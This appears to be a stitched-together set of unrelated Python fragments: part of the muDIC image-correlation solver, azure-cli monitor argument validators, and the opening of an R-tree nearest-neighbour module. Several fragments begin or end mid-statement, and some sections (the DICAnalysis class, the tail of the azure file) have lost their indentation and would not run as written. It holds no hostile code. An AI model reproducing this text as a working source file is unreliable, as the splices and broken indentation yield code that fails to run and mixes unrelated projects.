node_pos[1, :] += dnod[mesh.n_nodes:]
dnod_x += dnod
# Check for convergence
if np.max(np.abs(dnod)) < settings.tol:
logger.info('Frame converged in %s iterations', it)
return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, True
# Reset array values
logger.info("Frame did not converge. Largest increment was %f pixels" % np.max(dnod))
return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, False
def store_stripped_copy(reference_generator, storage):
    """
    Store a stripped copy of the reference object

    Wraps ``reference_generator`` so that every generated reference is
    also shallow-copied, has its memory-heavy fields cleared, and is
    appended to ``storage``. The full reference is still returned to the
    caller.

    Parameters
    ----------
    reference_generator : func
        The reference generator function
    storage : list
        The list where the stripped references are appended

    Returns
    -------
    func
        The wrapped reference generator
    """
    heavy_fields = ('Nref_stack', 'B_stack', 'K')

    def wrapper(*args, **kwargs):
        full_ref = reference_generator(*args, **kwargs)
        stripped = copy(full_ref)
        # Drop the resource-intensive members from the stored copy.
        for field in heavy_fields:
            setattr(stripped, field, None)
        storage.append(stripped)
        return full_ref

    return wrapper
def correlate(inputs, correlator, reference_gen):
    """
    Main correlation routine

    This routine manages result storage, reference generation and
    the necessary logic for handling convergence issues.

    Parameters
    ----------
    inputs : DIC_input object
        The input object containing all necessary data for performing a DIC analysis.
    correlator : func
        Function correlating one image frame to the current reference.
    reference_gen : func
        Function generating a reference from nodal coordinates.

    Returns
    -------
    node_coords, reference_stack, Ic_stacks
    """
    logger = logging.getLogger(__name__)
    mesh = inputs.mesh
    images = inputs.images
    settings = inputs

    # Do the initial setup
    images.image_reader.precision = settings.precision
    Ic_stacks = list()
    reference_stack = list()
    node_position_t = list()

    # When internals are stored, wrap the generator so a stripped copy of
    # every generated reference lands in reference_stack.
    if settings.store_internals:
        gen_ref = store_stripped_copy(reference_gen, storage=reference_stack)
    else:
        gen_ref = reference_gen

    # Initial nodal coordinates: first entry of the user-supplied history,
    # or the mesh's node positions.
    if settings.node_hist:
        node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, 0]
    else:
        node_coords = np.array((mesh.xnodes, mesh.ynodes), dtype=settings.precision)
    node_position_t.append(node_coords)

    reference = gen_ref(node_coords, mesh, images[0], settings, image_id=0)

    # Correlate the image frames
    try:
        for image_id in range(1, settings.max_nr_im):
            logger.info('Processing frame nr: %i', image_id)

            if settings.node_hist:
                if len(settings.node_hist) >= image_id:
                    # NOTE(review): guards on the first axis of node_hist
                    # but indexes its third axis -- confirm the intended
                    # layout of node_hist against callers.
                    logger.info("Using initial conditions")
                    node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, image_id]
                else:
                    pass

            # Scheduled reference update before correlating this frame.
            if image_id in settings.ref_update:
                logger.info('Updating reference at %i', image_id)
                reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id=(image_id - 1))

            img = images[image_id]
            try:
                node_coords, Ic, conv = correlator(node_coords, img, reference, settings)
                if not conv:
                    # Handle the convergence issue
                    if settings.noconvergence == "ignore":
                        pass
                    elif settings.noconvergence == "update":
                        # Retry once with a fresh reference from the
                        # previous frame.
                        logger.info("Updating reference due to lack of convergence.")
                        reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id - 1)
                        node_coords, Ic, conv = correlator(node_coords, img, reference, settings)
                        if not conv:
                            logger.info("Updating reference did not fix convergence issues, aborting...")
                            break
                    elif settings.noconvergence == "break":
                        logger.info("Aborting due to convergence issues.")
                        break
            except Exception as e:
                # Log and continue with the next frame; node_coords keeps
                # its last good value.
                logger.exception(e)
                pass

            if settings.store_internals:
                Ic_stacks.append(Ic)
            node_position_t.append(node_coords)
    finally:
        # NOTE(review): `return` inside `finally` suppresses any exception
        # raised in the loop (including KeyboardInterrupt) and returns the
        # partial results instead -- presumably intentional, but confirm.
        return np.array(node_position_t), reference_stack, Ic_stacks
def correlate_img_to_ref_q4(node_coordss, img, ref, settings):
    """Correlate one image frame to a Q4 reference, element by element.

    Iteratively samples the (spline-filtered) image at each element's
    local pixel coordinates, assembles the per-element residual terms into
    a global right-hand side and applies the least-squares nodal update
    until convergence or ``settings.maxit`` iterations.

    Parameters
    ----------
    node_coordss : ndarray
        Nodal coordinates, shape (2, n_nodes); the input is copied, not
        mutated.
    img : ndarray
        2d array containing the image frame.
    ref : Reference
        Q4 reference providing ``Nref_stack``, ``B_stack``, ``I0_stack``
        and ``K``.
    settings : DICInput
        Analysis settings; the mesh is taken from ``settings.mesh``.

    Returns
    -------
    node_coords, Ic, conv
        Updated nodal coordinates, pixel values of the last element
        sampled, and a convergence flag.
    """
    # Instantiate empty arrays
    node_coords = node_coordss.copy()
    # Pre-filter once; map_coordinates below runs with prefilter=False.
    img = nd.spline_filter(img, order=settings.interpolation_order)
    pix_cord_local = [np.zeros((2, ref.Nref_stack[elm_nr].shape[0]), dtype=np.float64) for elm_nr in
                      range(settings.mesh.n_elms)]
    n_nodes = settings.mesh.n_nodes
    n_nodes_elm = settings.mesh.element_def.n_nodes
    di = np.zeros(n_nodes_elm * 2, dtype=np.float64)
    dnod = np.zeros(n_nodes * 2, dtype=np.float64)
    C = np.zeros(n_nodes * 2, dtype=np.float64)

    # Find borders of the elements
    borders = find_elm_borders_mesh(node_coords, settings.mesh, settings.mesh.n_elms)

    # Extract image within element borders with padding
    img_frames = [img[borders[2, el].astype(int) - settings.pad:borders[3, el].astype(int) + settings.pad,
                  borders[0, el].astype(int) - settings.pad:borders[1, el].astype(int) + settings.pad] for el in
                  range(settings.mesh.n_elms)]

    # Normalize image frame flux
    # NOTE(review): dead branch -- normalization is disabled; `map` is
    # also lazy in Python 3, so enabling it as-is would need list().
    # Confirm intent before re-enabling.
    if False:
        img_frames = map(normalized_zero_mean, img_frames)

    # Element loop
    # TODO: This implementation does handle errors very pretty...
    for it in range(settings.maxit):
        C[:] = 0.0
        for el in range(settings.mesh.n_elms):
            Ic = np.zeros_like(ref.I0_stack[el], dtype=np.float64)
            # Find current coordinates element within the elm_frame
            np.dot(ref.Nref_stack[el], node_coords[0, settings.mesh.ele[:, el]] - borders[0, el] + settings.pad,
                   out=pix_cord_local[el][1])
            np.dot(ref.Nref_stack[el], node_coords[1, settings.mesh.ele[:, el]] - borders[2, el] + settings.pad,
                   out=pix_cord_local[el][0])

            # Determine greyscale value at XYc
            nd.map_coordinates(img_frames[el],
                               pix_cord_local[el], order=settings.interpolation_order, prefilter=False,
                               output=Ic)

            # Calculate B^T * dIK
            np.dot(ref.B_stack[el], (ref.I0_stack[el] - Ic), out=di)

            # TODO: This shape is awkvard
            # Order di to match format of K
            # NOTE(review): uses settings.elm.n_nodes here while
            # n_nodes_elm above comes from settings.mesh.element_def --
            # confirm both always agree.
            C[(settings.mesh.ele[:, el] + 1) * 2 - 2] += di[:settings.elm.n_nodes]
            C[(settings.mesh.ele[:, el] + 1) * 2 - 1] += di[settings.elm.n_nodes:]

        # Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution"
        np.dot(ref.K, C, out=dnod)

        # Add increment to nodal positions
        node_coords[0, :] += dnod[::2]
        node_coords[1, :] += dnod[1::2]

        # Check for convergence
        if np.max(np.abs(dnod)) < settings.tol:
            logging.info('Converged in %s iterations' % it)
            return node_coords, Ic, True

    logging.info('Did not converged in %s iterations last increment was %0.4f' % (it, np.max(np.abs(dnod))))
    return node_coords, Ic, False
# Calculate correlation factor for this element
class DICAnalysis(object):
def __init__(self, inputs):
"""
DIC analysis
The analysis object verifies and stores the DIC_input object.
When instantiated, the .run() method can be called, initiating the DIC analysis.
Parameters
----------
inputs : DIC_input object
The input object containing all neccessary data for performing a DIC analysis.
Returns
-------
DIC_analysis object
Examples
--------
The following example runs a virtual experiment
>>> import muDIC as dic
>>> import numpy as np
>>> import muDIC.vlab as vlab
>>> image_shape = (2000, 2000)
>>> speckle_image = vlab.rosta_speckle(image_shape, dot_size=4, density=0.32, smoothness=2.0, layers=4)
>>> F = np.array([[1.1, .0], [0., 1.0]], dtype=np.float64)
>>> image_deformer = vlab.imageDeformer_from_defGrad(F)
>>> downsampler = vlab.Downsampler(image_shape=image_shape, factor=4, fill=0.8, pixel_offset_stddev=0.1)
>>> noise_injector = vlab.noise_injector("gaussian", sigma=.1)
>>> image_generator = vlab.VirtualExperiment(speckle_image=speckle_image, image_deformer=image_deformer,
>>> downsampler=downsampler, noise_injector=noise_injector, n=n)
>>> image_stack = dic.ImageStack(image_generator)
>>> mesher = dic.Mesher(deg_n=1,deg_e=1)
>>> mesh = mesher.mesh(image_stack)
>>> input = muDIC.solver.correlate.DIC_input(mesh, image_stack)
>>> dic_job = dic.DIC_analysis(input)
>>> results = dic_job.run()
"""
self.logger = logging.getLogger()
self.__input__ = self.__verify_dic_input__(inputs)
def run(self):
"""
Run analysis
Parameters
----------
Returns
-------
DIC_output object
"""
node_x, node_y, reference_stack, Ic_stack = self.__solve__()
return DICOutput(node_x, node_y, self.__input__, ref_stack=reference_stack, Ic_stack=Ic_stack)
def get_input(self):
return self.__input__
def __solve__(self):
# TODO: Explicitly check that element fomulation
if isinstance(self.__input__.mesh.element_def, BSplineSurface):
node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_spline,
generate_reference)
else:
node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_q4,
generate_reference_Q4)
# TODO: Remove the need of transposing the matrices
return node_position[:, 0, :].transpose(), node_position[:, 1,
:].transpose(), reference_stack, Ic_Stack
@staticmethod
def __verify_dic_input__(inputs):
"""
Input type checker. Verifies all input and calculates missing values if they can be deduced from the others.
"""
inputs_checked = inputs
if not isinstance(inputs_checked, DICInput):
raise TypeError('Inputs has to be an instance of the DICInput class')
if not isinstance(inputs_checked.images, (ImageStack)):
raise TypeError('Image stack is not an instance of ImageStack')
if not isinstance(inputs_checked.mesh, Mesh):
raise TypeError('Mesh should be an instance of Mesh')
if isinstance(inputs_checked.max_nr_im, int) and inputs_checked.max_nr_im <= len(inputs_checked.images):
pass
else:
inputs_checked.max_nr_im = len(inputs_checked.images)
if not | |
# Source repository: xaliciayang/azure-cli
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands.validators import validate_tags, get_default_location_from_resource_group
from azure.cli.core.azclierror import RequiredArgumentMissingError, InvalidArgumentValueError
from knack.util import CLIError
def process_autoscale_create_namespace(cmd, namespace):
    """Validate and normalize arguments for `az monitor autoscale create`.

    Expands --resource into a full resource ID, derives the resource
    group from it when not supplied, and fills in a default location.
    """
    from msrestazure.tools import parse_resource_id

    validate_tags(namespace)
    expand_target = get_target_resource_validator(
        'resource', required=True, preserve_resource_group_parameter=True)
    expand_target(cmd, namespace)
    if not namespace.resource_group_name:
        parsed = parse_resource_id(namespace.resource)
        namespace.resource_group_name = parsed.get('resource_group', None)
    get_default_location_from_resource_group(cmd, namespace)
def validate_autoscale_recurrence(namespace):
    """Parse the raw --recurrence arguments into a Recurrence model.

    Expected form: ``-r week [DAY DAY ...]`` where each DAY is a unique
    prefix (at least two characters) of an English weekday name.
    """
    from azure.mgmt.monitor.models import Recurrence, RecurrentSchedule, RecurrenceFrequency

    def _validate_weekly_recurrence(namespace):
        # Construct days
        valid_days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
        days = []
        for partial in namespace.recurrence[1:]:
            if len(partial) < 2:
                raise CLIError('specifying fewer than 2 characters for day is ambiguous.')
            try:
                # Prefix-match against the not-yet-used day names.
                match = next(x for x in valid_days if x.lower().startswith(partial.lower()))
            except StopIteration:
                raise CLIError("No match for day '{}'.".format(partial))
            days.append(match)
            # Remove the matched day so duplicate arguments fail to match.
            valid_days.remove(match)

        # validate, but don't process start and end time
        recurrence_obj = Recurrence(
            frequency=RecurrenceFrequency.week,
            schedule=RecurrentSchedule(
                time_zone=namespace.timezone,
                days=days,
                hours=[],  # will be filled in during custom command
                minutes=[]  # will be filled in during custom command
            )
        )
        return recurrence_obj

    # Supported frequencies mapped to their usage string and parser.
    valid_recurrence = {
        'week': {
            'usage': '-r week [DAY DAY ...]',
            'validator': _validate_weekly_recurrence
        }
    }
    if namespace.recurrence:
        raw_values = namespace.recurrence
        try:
            delimiter = raw_values[0].lower()
            usage = valid_recurrence[delimiter]['usage']
            try:
                namespace.recurrence = valid_recurrence[delimiter]['validator'](namespace)
            except CLIError as ex:
                raise CLIError('{} invalid usage: {}'.format(ex, usage))
        except KeyError:
            # Unknown frequency keyword.
            raise CLIError('invalid usage: -r {{{}}} [ARG ARG ...]'.format(','.join(valid_recurrence)))
def validate_autoscale_timegrain(namespace):
    """Parse the raw --timegrain arguments into a MetricTrigger stub.

    Accepts an optional statistic keyword (default 'avg') followed by an
    optional period (default '1m'); only the time_grain and statistic
    fields of the resulting MetricTrigger are populated here.
    """
    from azure.mgmt.monitor.models import MetricTrigger
    from azure.cli.command_modules.monitor.actions import get_period_type
    from azure.cli.command_modules.monitor.util import get_autoscale_statistic_map

    values = namespace.timegrain
    if len(values) == 1:
        # workaround because CMD.exe eats > character... Allows condition to be
        # specified as a quoted expression
        values = values[0].split(' ')
    name_offset = 0
    try:
        # NOTE(review): values[1] raises IndexError (not caught) when only
        # one token is supplied -- confirm upstream guarantees two tokens.
        time_grain = get_period_type()(values[1])
        name_offset += 1
    except ValueError:
        # Second token is not a period; fall back to the 1-minute default.
        time_grain = get_period_type()('1m')
    try:
        statistic = get_autoscale_statistic_map()[values[0]]
        name_offset += 1
    except KeyError:
        # First token is not a statistic keyword; default to average.
        statistic = get_autoscale_statistic_map()['avg']
    # NOTE(review): name_offset is computed but never used -- presumably a
    # leftover from metric-name parsing; confirm before removing.
    timegrain = MetricTrigger(
        metric_name=None,
        metric_resource_uri=None,
        time_grain=time_grain,
        statistic=statistic,
        time_window=None,
        time_aggregation=None,
        operator=None,
        threshold=None
    )
    namespace.timegrain = timegrain
def get_target_resource_validator(dest, required, preserve_resource_group_parameter=False, alias='resource'):
    """Build a validator that normalizes the ``dest`` attribute into a
    full resource ID.

    The target may be supplied either as a complete resource ID, or as a
    name combined with --resource-group, --<alias>-type and optionally
    --<alias>-parent / --<alias>-namespace. The helper attributes
    (namespace, parent, resource_type and, unless preserved,
    resource_group_name) are removed from the namespace afterwards.
    """
    def _validator(cmd, namespace):
        from msrestazure.tools import is_valid_resource_id
        name_or_id = getattr(namespace, dest)
        rg = namespace.resource_group_name
        res_ns = namespace.namespace
        parent = namespace.parent
        res_type = namespace.resource_type

        usage_error = CLIError('usage error: --{0} ID | --{0} NAME --resource-group NAME '
                               '--{0}-type TYPE [--{0}-parent PARENT] '
                               '[--{0}-namespace NAMESPACE]'.format(alias))
        if not name_or_id and required:
            raise usage_error
        if name_or_id:
            # A full resource ID may not be combined with the name-based
            # parameters.
            if is_valid_resource_id(name_or_id) and any((res_ns, parent, res_type)):
                raise usage_error
            if not is_valid_resource_id(name_or_id):
                from azure.cli.core.commands.client_factory import get_subscription_id
                if res_type and '/' in res_type:
                    # 'Namespace/type' shorthand: split into its parts.
                    res_ns = res_ns or res_type.rsplit('/', 1)[0]
                    res_type = res_type.rsplit('/', 1)[1]
                if not all((rg, res_ns, res_type, name_or_id)):
                    raise usage_error
                setattr(namespace, dest,
                        '/subscriptions/{}/resourceGroups/{}/providers/{}/{}{}/{}'.format(
                            get_subscription_id(cmd.cli_ctx), rg, res_ns, parent + '/' if parent else '',
                            res_type, name_or_id))

        # Clean up helper parameters so they don't reach the command.
        del namespace.namespace
        del namespace.parent
        del namespace.resource_type
        if not preserve_resource_group_parameter:
            del namespace.resource_group_name

    return _validator
def validate_metrics_alert_dimension(namespace):
    """Convert a friendly dimension operator back to its grammar keyword.

    The conversion table is keyed by keyword, so scan the values for a
    match and replace the operator with the corresponding keyword.
    """
    from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import dim_op_conversion
    for keyword, value in dim_op_conversion.items():
        if namespace.operator == value:
            namespace.operator = keyword
            # BUG FIX: stop after the first match. Without the break the
            # already-converted keyword keeps being compared against the
            # remaining values and could be re-mapped; the sibling
            # converters in validate_metrics_alert_condition all break.
            break
def validate_metrics_alert_condition(namespace):
    """Normalize a parsed metrics-alert condition on the namespace.

    Converts friendly aggregation/operator/sensitivity words back to the
    grammar's canonical keywords, then checks the parameter combinations
    required for 'static' vs 'dynamic' conditions, supplying defaults for
    the dynamic evaluation window.
    """
    from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import op_conversion, \
        agg_conversion, sens_conversion
    # Reverse-map friendly words back to grammar keywords.
    for keyword, value in agg_conversion.items():
        if namespace.aggregation == value:
            namespace.aggregation = keyword
            break
    for keyword, value in op_conversion.items():
        if namespace.operator == value:
            namespace.operator = keyword
            break
    if namespace.condition_type == 'static':
        if namespace.threshold is None:
            raise RequiredArgumentMissingError('Parameter --threshold is required for static threshold.')
        if namespace.operator not in ('=', '!=', '>', '>=', '<', '<='):
            raise InvalidArgumentValueError('Parameter --operator {} is invalid for static threshold.'.format(
                op_conversion[namespace.operator]
            ))
    elif namespace.condition_type == 'dynamic':
        # Dynamic thresholds only support directional operators.
        if namespace.operator not in ('>', '<', '><'):
            raise InvalidArgumentValueError('Parameter --operator {} is invalid for dynamic threshold.'.format(
                op_conversion[namespace.operator]
            ))
        if namespace.alert_sensitivity is None:
            raise RequiredArgumentMissingError('Parameter --sensitivity is required for dynamic threshold.')
        for keyword, value in sens_conversion.items():
            if namespace.alert_sensitivity == value:
                namespace.alert_sensitivity = keyword
                break
        # Default evaluation window: 4 periods; violations default to the
        # window size capped at 4. Both must lie in 1-6.
        # NOTE(review): message grammar "should in range" reads oddly --
        # consider "should be in range" (kept as-is; callers/tests may
        # match the exact text).
        if namespace.number_of_evaluation_periods is None:
            setattr(namespace, 'number_of_evaluation_periods', 4)
        if namespace.number_of_evaluation_periods < 1 or namespace.number_of_evaluation_periods > 6:
            raise InvalidArgumentValueError('Parameter --num-periods {} should in range 1-6.'.format(
                namespace.number_of_evaluation_periods
            ))
        if namespace.min_failing_periods_to_alert is None:
            setattr(namespace, 'min_failing_periods_to_alert', min(4, namespace.number_of_evaluation_periods))
        if namespace.min_failing_periods_to_alert < 1 or namespace.min_failing_periods_to_alert > 6:
            raise InvalidArgumentValueError('Parameter --num-violations {} should in range 1-6.'.format(
                namespace.min_failing_periods_to_alert
            ))
        if namespace.min_failing_periods_to_alert > namespace.number_of_evaluation_periods:
            raise InvalidArgumentValueError(
                'Parameter --num-violations {} should be less than or equal to parameter --num-periods {}.'.format(
                    namespace.min_failing_periods_to_alert, namespace.number_of_evaluation_periods))
    else:
        raise NotImplementedError()
def validate_diagnostic_settings(cmd, namespace):
    """Normalize diagnostic-settings arguments.

    Expands --resource-uri and the storage/workspace/event-hub sink names
    into full resource IDs and verifies that at least one sink was
    supplied.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    from msrestazure.tools import is_valid_resource_id, resource_id, parse_resource_id

    get_target_resource_validator('resource_uri', required=True, preserve_resource_group_parameter=True)(cmd, namespace)
    if not namespace.resource_group_name:
        namespace.resource_group_name = parse_resource_id(namespace.resource_uri)['resource_group']

    # Expand bare sink names into full resource IDs in the same group.
    if namespace.storage_account and not is_valid_resource_id(namespace.storage_account):
        namespace.storage_account = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
                                                resource_group=namespace.resource_group_name,
                                                namespace='microsoft.Storage',
                                                type='storageAccounts',
                                                name=namespace.storage_account)

    if namespace.workspace and not is_valid_resource_id(namespace.workspace):
        namespace.workspace = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
                                          resource_group=namespace.resource_group_name,
                                          namespace='microsoft.OperationalInsights',
                                          type='workspaces',
                                          name=namespace.workspace)

    # When --event-hub is an ID, keep only its name component.
    if namespace.event_hub and is_valid_resource_id(namespace.event_hub):
        namespace.event_hub = parse_resource_id(namespace.event_hub)['name']

    if namespace.event_hub_rule:
        if not is_valid_resource_id(namespace.event_hub_rule):
            if not namespace.event_hub:
                raise CLIError('usage error: --event-hub-rule ID | --event-hub-rule NAME --event-hub NAME')
            # use value from --event-hub if the rule is a name
            namespace.event_hub_rule = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=namespace.resource_group_name,
                namespace='Microsoft.EventHub',
                type='namespaces',
                name=namespace.event_hub,
                child_type_1='AuthorizationRules',
                child_name_1=namespace.event_hub_rule)
        elif not namespace.event_hub:
            # extract the event hub name from `--event-hub-rule` if provided as an ID
            namespace.event_hub = parse_resource_id(namespace.event_hub_rule)['name']

    if not any([namespace.storage_account, namespace.workspace, namespace.event_hub]):
        raise CLIError(
            'usage error - expected one or more: --storage-account NAME_OR_ID | --workspace NAME_OR_ID '
            '| --event-hub NAME_OR_ID | --event-hub-rule ID')

    try:
        # resource_group_name may already have been consumed upstream.
        del namespace.resource_group_name
    except AttributeError:
        pass
def _validate_tags(namespace):
    """ Extracts multiple space-separated tags in key[=value] format """
    if not isinstance(namespace.tags, list):
        return
    merged = {}
    for raw_tag in namespace.tags:
        merged.update(_validate_tag(raw_tag))
    namespace.tags = merged
def _validate_tag(string):
""" Extracts a single tag in key[=value] format """
result = {}
if string:
comps = string.split('=', 1)
result = {comps[0]: comps[1]} if len(comps) > 1 else {string: ''}
return result
def process_action_group_detail_for_creation(namespace):
    """Assemble an ActionGroupResource from the parsed receiver arguments.

    Receivers of all supported kinds arrive in one flat list; they are
    bucketed by type into the resource's per-type receiver fields and the
    result is stored on the namespace as 'action_group'.
    """
    from azure.mgmt.monitor.models import ActionGroupResource, EmailReceiver, SmsReceiver, WebhookReceiver, \
        ArmRoleReceiver, AzureAppPushReceiver, ItsmReceiver, AutomationRunbookReceiver, \
        VoiceReceiver, LogicAppReceiver, AzureFunctionReceiver

    _validate_tags(namespace)

    ns = vars(namespace)
    name = ns['action_group_name']
    receivers = ns.pop('receivers') or []
    action_group_resource_properties = {
        'location': 'global',  # as of now, 'global' is the only available location for action group
        'group_short_name': ns.pop('short_name') or name[:12],  # '12' is the short name length limitation
        'email_receivers': [r for r in receivers if isinstance(r, EmailReceiver)],
        'sms_receivers': [r for r in receivers if isinstance(r, SmsReceiver)],
        'webhook_receivers': [r for r in receivers if isinstance(r, WebhookReceiver)],
        'arm_role_receivers': [r for r in receivers if isinstance(r, ArmRoleReceiver)],
        'itsm_receivers': [r for r in receivers if isinstance(r, ItsmReceiver)],
        'azure_app_push_receivers': [r for r in receivers if isinstance(r, AzureAppPushReceiver)],
        'automation_runbook_receivers': [r for r in receivers if isinstance(r, AutomationRunbookReceiver)],
        'voice_receivers': [r for r in receivers if isinstance(r, VoiceReceiver)],
        'logic_app_receivers': [r for r in receivers if isinstance(r, LogicAppReceiver)],
        'azure_function_receivers': [r for r in receivers if isinstance(r, AzureFunctionReceiver)],
        'tags': ns.get('tags') or None
    }
    ns['action_group'] = ActionGroupResource(**action_group_resource_properties)
def validate_metric_dimension(namespace):
    """Translate --dimension values into an OData $filter expression.

    --dimension and --filter are mutually exclusive; each dimension d is
    expanded to "d eq '*'" and the clauses are joined with ' and '.
    """
    dimensions = namespace.dimension
    if not dimensions:
        return
    if namespace.filters:
        raise CLIError('usage: --dimension and --filter parameters are mutually exclusive.')
    clauses = ["{} eq '*'".format(dim) for dim in dimensions]
    namespace.filters = ' and '.join(clauses)
def process_webhook_prop(namespace):
    """Convert a list of KEY[=VALUE] strings into a dict.

    Empty entries are dropped; a missing '=VALUE' part maps the key to
    ''. The namespace is left untouched when webhook_properties is not a
    list.
    """
    props = namespace.webhook_properties
    if not isinstance(props, list):
        return
    converted = {}
    for entry in props:
        if not entry:
            continue
        key, _, value = entry.partition('=')
        converted[key] = value
    namespace.webhook_properties = converted
def get_action_group_validator(dest):
    """Build a validator that expands bare action-group names stored in
    ``dest`` into full resource IDs (mutating each group object)."""
    def validate_action_groups(cmd, namespace):
        action_groups = getattr(namespace, dest, None)
        if not action_groups:
            return

        from msrestazure.tools import is_valid_resource_id, resource_id
        from azure.cli.core.commands.client_factory import get_subscription_id

        subscription = get_subscription_id(cmd.cli_ctx)
        resource_group = namespace.resource_group_name
        for group in action_groups:
            if is_valid_resource_id(group.action_group_id):
                continue  # already fully qualified
            group.action_group_id = resource_id(
                subscription=subscription,
                resource_group=resource_group,
                namespace='microsoft.insights',
                type='actionGroups',
                name=group.action_group_id
            )
    return validate_action_groups
def get_action_group_id_validator(dest):
    """Build a validator that replaces a list of action-group names/IDs in
    ``dest`` with lower-cased, fully-qualified resource IDs."""
    def validate_action_group_ids(cmd, namespace):
        groups = getattr(namespace, dest, None)
        if not groups:
            return

        from msrestazure.tools import is_valid_resource_id, resource_id
        from azure.cli.core.commands.client_factory import get_subscription_id

        subscription = get_subscription_id(cmd.cli_ctx)
        resource_group = namespace.resource_group_name
        normalized = []
        for group in groups:
            if not is_valid_resource_id(group):
                group = resource_id(
                    subscription=subscription,
                    resource_group=resource_group,
                    namespace='microsoft.insights',
                    type='actionGroups',
                    name=group
                )
            normalized.append(group.lower())
        setattr(namespace, dest, normalized)
    return validate_action_group_ids
def validate_private_endpoint_connection_id(namespace):
    """Expand --id into resource group / scope / connection name parts.

    After expansion (or when the parts were given directly) all three
    must be present; the transient connection_id attribute is always
    removed from the namespace.
    """
    if namespace.connection_id:
        from azure.cli.core.util import parse_proxy_resource_id
        parts = parse_proxy_resource_id(namespace.connection_id)
        namespace.resource_group_name = parts['resource_group']
        namespace.scope_name = parts['name']
        namespace.private_endpoint_connection_name = parts['child_name_1']

    required = (namespace.scope_name,
                namespace.resource_group_name,
                namespace.private_endpoint_connection_name)
    if not all(required):
        raise CLIError('incorrect usage. Please provide [--id ID] or [--name NAME --scope-name NAME -g NAME]')

    del namespace.connection_id
def validate_storage_accounts_name_or_id(cmd, namespace):
    """Expand bare storage-account names in --storage-account-ids into
    full resource IDs within the current subscription/resource group."""
    if not namespace.storage_account_ids:
        return
    from msrestazure.tools import is_valid_resource_id, resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    for pos, account in enumerate(namespace.storage_account_ids):
        if is_valid_resource_id(account):
            continue  # already a full resource ID
        namespace.storage_account_ids[pos] = resource_id(
            subscription=get_subscription_id(cmd.cli_ctx),
            resource_group=namespace.resource_group_name,
            namespace='Microsoft.Storage',
            type='storageAccounts',
            name=account
        )
def process_subscription_id(cmd, namespace):
    """Populate namespace.subscription_id with the active subscription."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    namespace.subscription_id = get_subscription_id(cmd.cli_ctx)
def process_workspace_data_export_destination(namespace):
if namespace.destination:
from azure.mgmt.core.tools import is_valid_resource_id, resource_id, parse_resource_id
if not is_valid_resource_id(namespace.destination):
raise CLIError('usage error: --destination should be a storage account, '
'an evenhug namespace or an event hub resource id.')
result = parse_resource_id(namespace.destination)
if result['namespace'].lower() == 'microsoft.storage' and result['type'].lower() == 'storageaccounts':
namespace.data_export_type = 'StorageAccount'
elif result['namespace'].lower() == 'microsoft.eventhub' and result['type'].lower() == 'namespaces':
namespace.data_export_type = 'EventHub'
namespace.destination = resource_id(
subscription=result['subscription'],
resource_group=result['resource_group'],
namespace=result['namespace'],
| |
# 2015-05-22
# r-tree featuring insert, nn and k-nn search with threshold distance
# tie-breaking for same distance is identifier value with largest values appearing earlier
# updated on 2016-08-22 to fix some bugs and re-structure
# updated on 2016-08-23 to fix traditional/non-traditional isLeafNode() distinction
# updated on 2016-11-02 to re-structure and modify adjustTree();
# stop at root instead of non-existent parent of root;
# note that there is a bug with setting M to two
# updated on 2016-11-03 to implement delete();
# note, however, that our tree lacks entry-aware nodes
# updated on 2016-11-05 to fix delete() by making addition of entries idempotent
import heapq
class PriorityQueue:
    """Min-heap priority queue.

    Each pushed item carries a priority; the item with the smallest
    priority is readable in O(1) via peek() and removable via pop().
    A priority cannot be changed after insertion, but the same item may
    be pushed again with a different priority.
    """

    # priorities are (-1 * distance, -1 * id-value) pairs

    def __init__(self):
        self.heap = []

    def push(self, item, priority):
        heapq.heappush(self.heap, (priority, item))

    def pop(self):
        """Remove and return the item with the smallest priority."""
        _priority, item = heapq.heappop(self.heap)
        return item

    def isEmpty(self):
        return not self.heap

    def peek(self):
        """Return the smallest (priority, item) pair without removing it."""
        return self.heap[0]

    def toList(self):
        """Return the stored items in arbitrary (heap) order."""
        return [entry[1] for entry in self.heap]

    def getSize(self):
        return len(self.heap)
import math
def getDistance(point1, point2):
    """Return the Euclidean distance between two (x, y) points.

    Uses math.hypot, which matches sqrt(dx**2 + dy**2) but avoids
    overflow/underflow of the squared intermediate terms.
    """
    x1, y1 = point1
    x2, y2 = point2
    return math.hypot(x2 - x1, y2 - y1)
class NearestNeighbor:
    """Mutable record of the best candidate found so far and its distance.

    Starts out empty: no item and an infinite distance, so any real
    candidate improves on the initial state.
    """

    def __init__(self, close_item=None, distance=float("inf")):
        self.close_item = close_item
        self.distance = distance

    def getCloseItem(self):
        return self.close_item

    def getDistance(self):
        return self.distance

    def setCloseItem(self, close_item):
        self.close_item = close_item

    def setDistance(self, distance):
        self.distance = distance

    def toString(self):
        """Return '<item> <distance>' for debugging."""
        return "{} {}".format(self.getCloseItem(), self.getDistance())
class KNearestNeighbor:
    """Bounded collection of (roughly) the k points closest to a query point.

    Backed by a priority queue whose priorities are negated distances, so
    the *farthest* retained point surfaces first and can be evicted.
    Ties on distance are broken by id value.
    """

    def __init__(self, query_point, close_item_pq, k=100):
        self.query_point = query_point
        # priority queue we use uses a min-heap
        # as a result, we negate priorities
        self.close_item_pq = close_item_pq
        self.k = k

    # note that we do not always retrieve k items - could be less or could be more due to threshold
    def getCloseItems(self):
